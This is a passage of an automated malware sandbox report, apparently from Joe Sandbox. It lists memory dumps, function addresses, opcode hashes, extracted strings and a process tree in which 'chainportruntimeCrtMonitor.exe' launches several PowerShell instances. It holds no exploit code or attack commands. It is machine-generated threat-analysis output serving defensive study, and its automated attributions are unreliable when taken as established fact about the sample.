Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: p|$z|
API String ID: 1269201914-3308484969
Opcode ID: 87bf798cd257a13aa4fac5c1f767570e3d1af6e422b84e78b9bc0b22296244ce
Instruction ID: 6ff6c1310991ba353a1fa48ff33d9359051549f1c6bffd2988d5d04bdafe0e5f
Opcode Fuzzy Hash: 87bf798cd257a13aa4fac5c1f767570e3d1af6e422b84e78b9bc0b22296244ce
Instruction Fuzzy Hash: A7B012E525B880BC310C91551C07F37038CD4C8F10330502EF904C0081D84C0F450433

Function 007CE455 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE467

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

U|, xrefs: 007CE455
p|, xrefs: 007CE461

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: U|$p|
API String ID: 1269201914-2018001501
Opcode ID: bda6b8f85b2499fcc71c48a29d965047176c1dd2fcfc071e8320c7bd358d9b22
Instruction ID: 4a86776662e0759535192f8d2c46aefcc8c4c4ba79c2f5128362743e92252037
Opcode Fuzzy Hash: bda6b8f85b2499fcc71c48a29d965047176c1dd2fcfc071e8320c7bd358d9b22
Instruction Fuzzy Hash: 86B012E525B880BC310C11511D07D37134CC4C4F10330D02EFB00D0081D84C0F460433

Analysis Process: chainportruntimeCrtMonitor.exePID: 7584, Parent PID: 7540COMMON

Execution Graph

Execution Coverage:	6.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	4
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF8490C62FB Relevance: .2, Instructions: 237
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2253556351.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff8490c0000_chainportruntimeCrtMonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a4be47447f382274b34cf61074641083e226181f81eb3a1893067144b971c0a
Instruction ID: d73fc8e84934ab6f17c553de4746f71d8c8798d31623ffbff7750407e5da44e9
Opcode Fuzzy Hash: 8a4be47447f382274b34cf61074641083e226181f81eb3a1893067144b971c0a
Instruction Fuzzy Hash: E481A17190C68E9FEF69EF68C8985E97BB0FF64344F1400BAD409C7192EA35E815DB90

Function 00007FF848F10708 Relevance: 1.7, APIs: 1, Instructions: 470
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00007FF848F234EF

Memory Dump Source

Source File: 00000005.00000002.2249882762.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_chainportruntimeCrtMonitor.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 126ea6518ca3079425a9bbcba274ec8b460ea7a3cf1203937af6eebc11ad6fac
Instruction ID: 91b0d11ccb004098f08b0eb838c8af99f431449738dcb9dcb008a75c9873886d
Opcode Fuzzy Hash: 126ea6518ca3079425a9bbcba274ec8b460ea7a3cf1203937af6eebc11ad6fac
Instruction Fuzzy Hash: A0F18F7091DA8D8FDB95EF68D845AEDBBF0FF59300F0401AAE448D3292DB35A985CB41

Function 00007FF8490C72E0 Relevance: 1.3, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5, xrefs: 00007FF8490C72FB

Memory Dump Source

Source File: 00000005.00000002.2253556351.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff8490c0000_chainportruntimeCrtMonitor.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-2226203566
Opcode ID: 56c3fd86c961be79beda3f7824755f81bbc6f886914f62c555cc088777985073
Instruction ID: 8f2ae5c7ddf78a7fe853533f4ec59f20125a848223a966abefb2e5385ffae59c
Opcode Fuzzy Hash: 56c3fd86c961be79beda3f7824755f81bbc6f886914f62c555cc088777985073
Instruction Fuzzy Hash: 84D09E3451C68A9FDF68EF14C8959AE77B1FF58344F100529E44A93280CB39E550CB81

Function 00007FF8490C63A5 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2253556351.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff8490c0000_chainportruntimeCrtMonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 128f1d60311c0531a6eb53c1b29b2a33ac708495a861417af42a6efddc4441f8
Instruction ID: 0683fe1ae85aec132517e23548efaa101004a11cdad54fb7eab5761015084836
Opcode Fuzzy Hash: 128f1d60311c0531a6eb53c1b29b2a33ac708495a861417af42a6efddc4441f8
Instruction Fuzzy Hash: 6F111C31908A4E9FDF95EF58C899AEA7BF0FF64345F14016AD41CC6151DB34A554CB80

Function 00007FF8490C6460 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2253556351.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff8490c0000_chainportruntimeCrtMonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bf2427d6e5a362c5e0c3627131490303120806798e7087c5a1b9acb395d772f
Instruction ID: 1d90bb019ebea5856aa30b8f92c5a59273a023c9abb6606aad55669b287fd022
Opcode Fuzzy Hash: 9bf2427d6e5a362c5e0c3627131490303120806798e7087c5a1b9acb395d772f
Instruction Fuzzy Hash: F301E470918A4D9FDF94EF68C849AEA77B0FF28304F04056AE419D7291EB34AA50CB80

Function 00007FF8490C56C6 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2253556351.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff8490c0000_chainportruntimeCrtMonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25fe72468da92e65c6f7259eaf451768dff6a4a5add138799762713a4a6452ee
Instruction ID: 0e4d05c5a91db26b170019bcd6ba88a374f1f83c799106859dc5b5dde2b764e7
Opcode Fuzzy Hash: 25fe72468da92e65c6f7259eaf451768dff6a4a5add138799762713a4a6452ee
Instruction Fuzzy Hash: 05F0BE3190D84A9EEB98FF18C01ABBAB2A1FF89340F144175E10ADB093CE3CF4448790

Analysis Process: powershell.exePID: 7916, Parent PID: 7584COMMON

Executed Functions

Function 00007FF848FE6605 Relevance: 7.9, Strings: 6, Instructions: 430COMMON

Download Yara Rule

Strings

(B#I, xrefs: 00007FF848FE6974
(B#I, xrefs: 00007FF848FE66ED
(B#I, xrefs: 00007FF848FE678C
(B#I, xrefs: 00007FF848FE6858
(B#I, xrefs: 00007FF848FE67C3
X7oA, xrefs: 00007FF848FE67FD

Memory Dump Source

Source File: 00000016.00000002.3315445469.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID: (B#I$(B#I$(B#I$(B#I$(B#I$X7oA
API String ID: 0-2268908105
Opcode ID: 4b5f8888ff9adc4e257261258e361b98c4169f3ab12381770dd3927db228b23d
Instruction ID: 91a96fee0bc73c327ae52de9c08cfd5044572de41a0f241671a37d23dcfb71c1
Opcode Fuzzy Hash: 4b5f8888ff9adc4e257261258e361b98c4169f3ab12381770dd3927db228b23d
Instruction Fuzzy Hash: 00C15231D1EA8E5FEB99AB2858545B9BBA1EF15390F1801FED44DCB0C3EB1CA805C355

Function 00007FF848FE4073 Relevance: 1.4, Strings: 1, Instructions: 182COMMON

Download Yara Rule

Strings

8>#I, xrefs: 00007FF848FE413A

Memory Dump Source

Source File: 00000016.00000002.3315445469.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID: 8>#I
API String ID: 0-2340899229
Opcode ID: 70bc191072c38b79f8047be51c8919d409c7077c9a01a865d1855a9729ff5e62
Instruction ID: ed4ff231ac4de9882c4a96088b7ddba6442a95858cdab89996952c5204b20f77
Opcode Fuzzy Hash: 70bc191072c38b79f8047be51c8919d409c7077c9a01a865d1855a9729ff5e62
Instruction Fuzzy Hash: E051D232A0DE4A4FEB9AEB2C941167577E2EFA4260F5801BEC15DC71D2DF1CE8058259

Function 00007FF848FE40BF Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

8>#I, xrefs: 00007FF848FE413A

Memory Dump Source

Source File: 00000016.00000002.3315445469.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID: 8>#I
API String ID: 0-2340899229
Opcode ID: 192415296f55416ee9b509b01c9e2f1c0f8d307061fe103c0a3f8f3b0b2f8f58
Instruction ID: 5b3e5223edc8dce710036f24217fe375ce7b492faa9c55986edbe37f8a2a271a
Opcode Fuzzy Hash: 192415296f55416ee9b509b01c9e2f1c0f8d307061fe103c0a3f8f3b0b2f8f58
Instruction Fuzzy Hash: 7F219E32E0DE4A4FEBAAEB18945157466D2FF742A0F5901BEC11DC72E6CF1CEC04824A

Function 00007FF848DFE380 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3296964311.00007FF848DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848dfd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebe41b35469449284107c05fa89ad53bf3b81c2cd636248b9d685a4a616fb76c
Instruction ID: 8d6c5a833bd41260147553b543299f96f327f331767bf6a5f345b8ef15860dc9
Opcode Fuzzy Hash: ebe41b35469449284107c05fa89ad53bf3b81c2cd636248b9d685a4a616fb76c
Instruction Fuzzy Hash: 5341137180EBC44FE7569B28A845A563FF0EF52365F1502EFD088CB1A3D725E84AC792

Function 00007FF848F197A8 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3306196245.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ff27828246161ea0a806d5fd12257a53103d34348cc1c2945e9c2bc33355ada
Instruction ID: e4864b09df273e44dceecfd057393a07243694c9f3cbcb5d77177b366b115d38
Opcode Fuzzy Hash: 1ff27828246161ea0a806d5fd12257a53103d34348cc1c2945e9c2bc33355ada
Instruction Fuzzy Hash: CC31A43191CB4C9FDB58DB5CA84A6A97BE0FB98321F00422FE449D3651CB74A855CBC2

Function 00007FF848F1A49C Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3306196245.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98f70ba28c94ea26df433e6851550a0bd219f4ef7c370efddee3c4249605d03d
Instruction ID: 273e073b5ccbc688f7993140bac71592e45636c16a1c7b8df25fc4f6f329095b
Opcode Fuzzy Hash: 98f70ba28c94ea26df433e6851550a0bd219f4ef7c370efddee3c4249605d03d
Instruction Fuzzy Hash: E421E63190CB4C4FDB59DBAC984A7E97BF0EB96321F04426BD049C3192D674A85ACB91

Function 00007FF848F133B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3306196245.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 191617ceee889ec1b776a361fbb2d1250ce1ead809f4672e64413ffe75dfec08
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 7201677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45

Function 00007FF848FE4400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3315445469.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b897f73ce60a6031fe12c14865419d4498a0cbff1fea06b723fdd7177b03ae71
Instruction ID: cc4b7810ab8e5552337862f4a533dacb315480aebf4efadbb461724746441026
Opcode Fuzzy Hash: b897f73ce60a6031fe12c14865419d4498a0cbff1fea06b723fdd7177b03ae71
Instruction Fuzzy Hash: D0F0B832A0C9448FD758EB0CE4448A8B3E0FF04320F1900BAE009CB8A3DB2AAC608765

Function 00007FF848F16220 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3306196245.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a7b2191df41b1cc6c51806a1a33b4d35b6b20e128db04e1d97e32555666b302
Instruction ID: 9aa14ac9b843e4e9f9376b9f836521cf3dfabbd03d370f38c8c0db7b8455250f
Opcode Fuzzy Hash: 7a7b2191df41b1cc6c51806a1a33b4d35b6b20e128db04e1d97e32555666b302
Instruction Fuzzy Hash: A9E0B635814A4C8F8B44EF18D8099EAB7A0FB68315B11425BB81ED7160DB31AA98CBC2

Non-executed Functions

Function 00007FF848F18BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

N_^J, xrefs: 00007FF848F18C8A
N_^F, xrefs: 00007FF848F18C7A
N_^7, xrefs: 00007FF848F18C12
N_^4, xrefs: 00007FF848F18BFA

Memory Dump Source

Source File: 00000016.00000002.3306196245.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_powershell.jbxd

Similarity

API ID:
String ID: N_^4$N_^7$N_^F$N_^J
API String ID: 0-3508309026
Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
Instruction ID: f6facd9be01d464781fe06f2e9dfce22635aafd9ed82b64586b0b92a0b284f4c
Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
Instruction Fuzzy Hash: 8E213B7761A0259ED3417BBDBC145DA3750EF942B8B4502B2D298CF143EA1C708686D5

Analysis Process: powershell.exePID: 7932, Parent PID: 7584COMMON

Executed Functions

Function 00007FF848FE6605 Relevance: 6.7, Strings: 5, Instructions: 429COMMON

Download Yara Rule

Strings

(B#I, xrefs: 00007FF848FE6974
(B#I, xrefs: 00007FF848FE6858
(B#I, xrefs: 00007FF848FE678C
(B#I, xrefs: 00007FF848FE67C3
(B#I, xrefs: 00007FF848FE66ED

Memory Dump Source

Source File: 00000017.00000002.3321339870.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID: (B#I$(B#I$(B#I$(B#I$(B#I
API String ID: 0-1620291718
Opcode ID: 918b70e606ebf7270689f5837d9fe59406120815c6c4d510a3dc6605424384d8
Instruction ID: 111e4642b794eeb0333bca7575056745356c190452b5cf73892610e9d0da69fd
Opcode Fuzzy Hash: 918b70e606ebf7270689f5837d9fe59406120815c6c4d510a3dc6605424384d8
Instruction Fuzzy Hash: 65C14231D1EA8E5FEB99AB2858545B9BBA1EF16390F1801FED44DCB0D3EB1CA801C355

Function 00007FF848FE4073 Relevance: 1.4, Strings: 1, Instructions: 182COMMON

Download Yara Rule

Strings

8>#I, xrefs: 00007FF848FE413A

Memory Dump Source

Source File: 00000017.00000002.3321339870.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID: 8>#I
API String ID: 0-2340899229
Opcode ID: 70bc191072c38b79f8047be51c8919d409c7077c9a01a865d1855a9729ff5e62
Instruction ID: ed4ff231ac4de9882c4a96088b7ddba6442a95858cdab89996952c5204b20f77
Opcode Fuzzy Hash: 70bc191072c38b79f8047be51c8919d409c7077c9a01a865d1855a9729ff5e62
Instruction Fuzzy Hash: E051D232A0DE4A4FEB9AEB2C941167577E2EFA4260F5801BEC15DC71D2DF1CE8058259

Function 00007FF848FE40BF Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

8>#I, xrefs: 00007FF848FE413A

Memory Dump Source

Source File: 00000017.00000002.3321339870.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID: 8>#I
API String ID: 0-2340899229
Opcode ID: 192415296f55416ee9b509b01c9e2f1c0f8d307061fe103c0a3f8f3b0b2f8f58
Instruction ID: 5b3e5223edc8dce710036f24217fe375ce7b492faa9c55986edbe37f8a2a271a
Opcode Fuzzy Hash: 192415296f55416ee9b509b01c9e2f1c0f8d307061fe103c0a3f8f3b0b2f8f58
Instruction Fuzzy Hash: 7F219E32E0DE4A4FEBAAEB18945157466D2FF742A0F5901BEC11DC72E6CF1CEC04824A

Function 00007FF848DFE380 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.3305537520.00007FF848DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848dfd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 821f086042db5c382709cad47d9c69b414feabbd5fe42bbfc96bd36163b43296
Instruction ID: 1a8a949ffbf3954c8fd20f57122825dac24bbae59753d5df2077a192756fa614
Opcode Fuzzy Hash: 821f086042db5c382709cad47d9c69b414feabbd5fe42bbfc96bd36163b43296
Instruction Fuzzy Hash: 7041237180EBC44FE7569B289845A523FF0EF52361F1501EFD088CF1A3D725A84AC792

Function 00007FF848F197A8 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.3314554054.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ff27828246161ea0a806d5fd12257a53103d34348cc1c2945e9c2bc33355ada
Instruction ID: e4864b09df273e44dceecfd057393a07243694c9f3cbcb5d77177b366b115d38
Opcode Fuzzy Hash: 1ff27828246161ea0a806d5fd12257a53103d34348cc1c2945e9c2bc33355ada
Instruction Fuzzy Hash: CC31A43191CB4C9FDB58DB5CA84A6A97BE0FB98321F00422FE449D3651CB74A855CBC2

Function 00007FF848F1A49C Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.3314554054.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98f70ba28c94ea26df433e6851550a0bd219f4ef7c370efddee3c4249605d03d
Instruction ID: 273e073b5ccbc688f7993140bac71592e45636c16a1c7b8df25fc4f6f329095b
Opcode Fuzzy Hash: 98f70ba28c94ea26df433e6851550a0bd219f4ef7c370efddee3c4249605d03d
Instruction Fuzzy Hash: E421E63190CB4C4FDB59DBAC984A7E97BF0EB96321F04426BD049C3192D674A85ACB91

Function 00007FF848F133B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.3314554054.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 191617ceee889ec1b776a361fbb2d1250ce1ead809f4672e64413ffe75dfec08
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 7201677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45

Function 00007FF848F1A0FB Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.3314554054.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 003996dd1f4120ac812d71732a900c2572acb54005094b4c9c0a67abf2539866
Instruction ID: 5132b4b3eac1a036f22ebc31de073108103934c0f83332e5f9e5d94fb74dbb65
Opcode Fuzzy Hash: 003996dd1f4120ac812d71732a900c2572acb54005094b4c9c0a67abf2539866
Instruction Fuzzy Hash: F3F0AF3A90CA894FDB85EB2898590E5BF90FF65381F0402B7E548C70A2EE2598488B81

Function 00007FF848FE4400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.3321339870.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b897f73ce60a6031fe12c14865419d4498a0cbff1fea06b723fdd7177b03ae71
Instruction ID: cc4b7810ab8e5552337862f4a533dacb315480aebf4efadbb461724746441026
Opcode Fuzzy Hash: b897f73ce60a6031fe12c14865419d4498a0cbff1fea06b723fdd7177b03ae71
Instruction Fuzzy Hash: D0F0B832A0C9448FD758EB0CE4448A8B3E0FF04320F1900BAE009CB8A3DB2AAC608765

Non-executed Functions

Function 00007FF848F18BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

N_^F, xrefs: 00007FF848F18C7A
N_^4, xrefs: 00007FF848F18BFA
N_^J, xrefs: 00007FF848F18C8A
N_^7, xrefs: 00007FF848F18C12

Memory Dump Source

Source File: 00000017.00000002.3314554054.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f10000_powershell.jbxd

Similarity

API ID:
String ID: N_^4$N_^7$N_^F$N_^J
API String ID: 0-3508309026
Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
Instruction ID: f6facd9be01d464781fe06f2e9dfce22635aafd9ed82b64586b0b92a0b284f4c
Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
Instruction Fuzzy Hash: 8E213B7761A0259ED3417BBDBC145DA3750EF942B8B4502B2D298CF143EA1C708686D5

Analysis Process: powershell.exePID: 7952, Parent PID: 7584COMMON

Executed Functions

Function 00007FF848FF6605 Relevance: 6.7, Strings: 5, Instructions: 431COMMON

Download Yara Rule

Strings

(B$I, xrefs: 00007FF848FF6974
(B$I, xrefs: 00007FF848FF67C3
(B$I, xrefs: 00007FF848FF678C
(B$I, xrefs: 00007FF848FF66ED
(B$I, xrefs: 00007FF848FF6858

Memory Dump Source

Source File: 00000019.00000002.3335714242.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848ff0000_powershell.jbxd

Similarity

API ID:
String ID: (B$I$(B$I$(B$I$(B$I$(B$I
API String ID: 0-3685135179
Opcode ID: 7f573d3283a2dbeceb7cd38ac7883135df89d354a6e84092e6c991fffa545ad5
Instruction ID: e9e21df343cb8de9b7095cbda2c00e0bdb09ef6aaf2f662c2449b5797a0c6a4c
Opcode Fuzzy Hash: 7f573d3283a2dbeceb7cd38ac7883135df89d354a6e84092e6c991fffa545ad5
Instruction Fuzzy Hash: 91D12031D0EA8A5FEB99AB2858156B57BA1EF1A390F1801FFD14DCB0D3EE1CA805C355

Function 00007FF848FF4073 Relevance: 1.4, Strings: 1, Instructions: 182COMMON

Download Yara Rule

Strings

8>$I, xrefs: 00007FF848FF413A

Memory Dump Source

Source File: 00000019.00000002.3335714242.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848ff0000_powershell.jbxd

Similarity

API ID:
String ID: 8>$I
API String ID: 0-3301367642
Opcode ID: 50b390c54d72ea65fcaf589ee5fcbfae54446a3df271688efd8a8247c7b7a750
Instruction ID: 2580599cbb31283f5fb6b83c2a34684f46e4dcc1484284a4b4fb2718e14721e2
Opcode Fuzzy Hash: 50b390c54d72ea65fcaf589ee5fcbfae54446a3df271688efd8a8247c7b7a750
Instruction Fuzzy Hash: 3B51F132A0DA4A4FE79AEB2C541167577E2FFA4260F1801BBD25EC72D3DF18E8058249

Function 00007FF848FF40BF Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

8>$I, xrefs: 00007FF848FF413A

Memory Dump Source

Source File: 00000019.00000002.3335714242.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848ff0000_powershell.jbxd

Similarity

API ID:
String ID: 8>$I
API String ID: 0-3301367642
Opcode ID: 14cf21391ff41a3f7860f607d111d6eaeb3e83ee7681ce161ea96fe79d2a0766
Instruction ID: c77440aec5c28cce1d30f2e4ebf36ceefbdaa7f0299c9e68cc75c131808a53c7
Opcode Fuzzy Hash: 14cf21391ff41a3f7860f607d111d6eaeb3e83ee7681ce161ea96fe79d2a0766
Instruction Fuzzy Hash: 21219E32E0D94A4FE7AAEB18545157466D2FF742A0F5901BBD21DC72E6DF18EC048249

Function 00007FF848E0E380 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

